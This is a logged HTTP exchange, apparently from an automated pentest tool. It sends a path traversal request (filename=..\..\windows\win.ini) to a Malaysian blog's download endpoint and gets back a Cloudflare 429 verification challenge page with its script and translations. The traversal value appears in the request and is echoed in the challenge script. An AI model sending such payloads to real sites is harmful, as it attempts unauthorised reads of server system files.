REQUEST:
GET https://my.myfirst.tech/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?filename=..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:31:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9736
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c83b966a18a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=Uzk%2B1u6jRRS95MCkMGfXtX8AYlyVEcJ%2BrBx5W31ljExa1t1Bk%2BnuvZdaBHRDbggH2XSQFWlxvTNK%2FgnhfzNXjRlaVeyClv52zzJ3TjfPSz543fISvSti79DFVgOJf4W9FA%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c83b966a18a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'hnpFT.Zo2BBk0aaKLcSTl6VWkm5F_jomSNaLIUVUIQU-1784280676-1.2.1.1-o9jVlV88HIDPqB_IaC.DqeA8V9gkHqutPQn9xmDdX0EEwgY2H52LOG_2TjC.lqr5',cITimeS: '1784280676',cRay: 'a1c83b966a18a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?filename=..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini\u0026__cf_chl_tk=TQReWD5W77yKMEeY06UOOz5H0iT4VIdfHmOM8eI_HgM-1784280676-1.0.1.1-9VbifbTxztY4.CLpkIB3uh9gbiA9VzNba1UQL_vnxgw",cvId: '3',cZone: 'my.myfirst.tech',fa:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?filename=..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini\u0026__cf_chl_f_tk=TQReWD5W77yKMEeY06UOOz5H0iT4VIdfHmOM8eI_HgM-1784280676-1.0.1.1-9VbifbTxztY4.CLpkIB3uh9gbiA9VzNba1UQL_vnxgw",md: 'hiExWievOJABnApop2qsfwNXKtS4NmrDtN7..bhjc9c-1784280676-1.2.1.1-OOiTGRk4gWhyXblehACZSsL0iHBSSzBv9Zmt.MRm.tLKdbq7n8smfMr1yho.ViG3NgHgyOLTzGYSTO15yRzqf9ZnMOP7TSBG1QyODIjRBgZ6ALHNVm4ppULHQd8y41ZK8kP6AqY1.3g306G.4VPxAqaWroYTmFXpvVbMU65zS4GTwxKq0.swXuA1_6osyC4IJzZCW2DOWQd7EWj5rb.MC2VkUjGFg1bnM0YJUjRHc7yHWSj3TWnnCgVX3lqUxWMiQueQEn4NQvRRf0hy1gd26vBKU3eLOfDxIp96nKBFQ9B11Gq5itZX2PhlO820b8FHLeZB3z75tw6b2ssOnXf2SDEk6kw5NCdfO1.r.BJOgcwDBMSjSkcqK7hqBD0PabbR5d2lLhpDGMAPf71SQYwWfuBCVdgG.e5ssJwZR0reOCB5rySs0oIXN9VHlZji3ev6MvlLGovqngFSc_s.ehJ0sRYi6GUAB4GgrgJOD8manMrJncljBtNxdjNuaYvZxgIuxw7bAAMp2khBZJtV3U1OlcXR.pWTaNiSRDwBS3npez0vy7XTotbLS1wACQRrmjtlYJB3UXf1jD5kyP7.iwQUlWVsF1fSWq7mGGs8T4.3hkrsL2IvsyFU_HRL.O0bLRCOITmBInkYeBuwRTC4a0NgA7ooR_sYxIzRlUUBRD6IWZ0jl0nMLoSL_0NbYEcOuWY1KB44FJf6RDZmIGoVoyCsEMyaA30t.J6Gys1_nRvhDWXvJNBpil.7dC3OnrqiBvyVu4ab5.i5tjWyZvdhA_JXEjezR6ZmJBGyZOiKQmQIBCLuWgbIvtzTr0ewkF_cPZ4h7TiyNmH3ULXBpQeUWtx5ws91m0vco1ehFyCLVuyGarVkHEwyPe5a5Xo45lckzZ.DyDScoozoKBkKP8aDp3PXKRJZJPrffnCnZNTEmN2H0QiaOQacs9T2BRyHO.ufAlaoqafST97JV00cl8y1zuon2twkGXRw31tr5PRtoCNynV_MP9gGns5OfFPgbNmYv9AnqBW6ga7.wuJCtXnJDZiwrd4l2Jj.Seod__d4GIWMd88V77Ptj6cX2t8G1vnJDm6g.ix.zqhFzeHjLu79QcRazugvDYDhdbsvk2ma5YG2h0Zdl7oUi7Fod0mxIKB0F7mGXFx00qBscxQ_A_J7GeEyyfpA0GiYd4GytfwHkm2S2WYtn43z4shguzrfQXQvXQyp.f_M3KZOvkYQJm1EYW9ngfIxBcrL1ZJO0Po4blhAB4PMRmYRVMiRtv8DA89WVP4Jayc8eGj7bp_0JUayZZis9GZIyjVkIfQ.1mIh.XQDx1k',mdrd: 'dwzIuUBF1dwXq9dLHozX0zpTYiCpT0E4fNWaXbA8W9s-1784280676-1.2.1.1-qQH6iNOUhYVptj.ofAy5zo5.wr0NFamZ_b3COn5lmXAdc8NLOaisB72wPxVC1Bu7ci_IzN14Gh1o20.KrlWRem31Vz.HrJwcyqVgPt7jXDzaAPEaUumlQFPiZzzX7qzAYIrUBeLr65Xo7EkFr3KK9nzl_2KkAe.KHf8pJ1n6GtV3.hblso3ssxgHdyC99dKegB0jZ.aWe0ja1BJ1VrXLz2tV6SybNEkfQAIXkta2uQqbLiX2L8WGtyVu8N19Dm2J',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c83b966a18a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?filename=..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini\u0026__cf_chl_rt_tk=TQReWD5W77yKMEeY06UOOz5H0iT4VIdfHmOM8eI_HgM-1784280676-1.0.1.1-9VbifbTxztY4.CLpkIB3uh9gbiA9VzNba1UQL_vnxgw"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
